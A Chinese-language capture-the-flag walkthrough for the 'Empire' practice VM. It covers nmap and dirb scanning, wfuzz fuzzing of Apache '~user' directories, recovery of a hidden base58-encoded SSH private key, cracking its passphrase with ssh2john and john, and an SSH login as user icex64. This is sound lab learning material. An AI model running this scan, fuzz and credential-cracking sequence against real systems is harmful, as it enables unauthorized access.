empire靶机
打开靶机
我们先查看页面源代码,发现什么也没有
再去用nmap扫描
nmap -sV -p- 192.168.95.144
发现也没什么用
我们在用dirb扫一下
dirb http://192.168.95.144
我们发现了robots.txt并且响应码是200,去访问一下
又得到了一个目录,去访问一下
到这里404就蒙了,去网上搜了一下,用wfuzz工具输入下面这条命令
wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt --hc 403,404 http://192.168.95.144/~FUZZ在旧版本的Apache服务器中,~ 指代用户主目录,我们可以尝试找到与此相似的路径,这种时候就用到wfuzz了
payload下有一个secret,去访问一下这个目录
我们发现了一段话,大概说的是这是一个秘密目录,这里有他隐藏起来的ssh私钥文件,我们又得知了用户名是icex64,继续在这个路径在搜索文件
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,403 -u http://192.168.95.144/~secret/.FUZZ.txt
这里已经跑出来了一个文件,我们去访问一下,先访问了mysecret页面显示not found,又去找攻略,结果是个隐藏文件访问.mysecret.txt
复制下来去解码(base58(网上搜的))
把解码后的内容复制下来去创建一个文件key
复制进去保存
利用john工具破解密码
先使用ssh2john工具转化为john可破解的格式:
/usr/share/john/ssh2john.py key > hash
再使用john破解hash:
john hash --wordlist=/usr/share/wordlists/fasttrack.txt
密码为P@55w0rd!
然后将key文件权限设为600(否则无法连接),然后利用ssh连接icex64用户
chmod 600 key
ssh icex64@192.168.95.144 -i key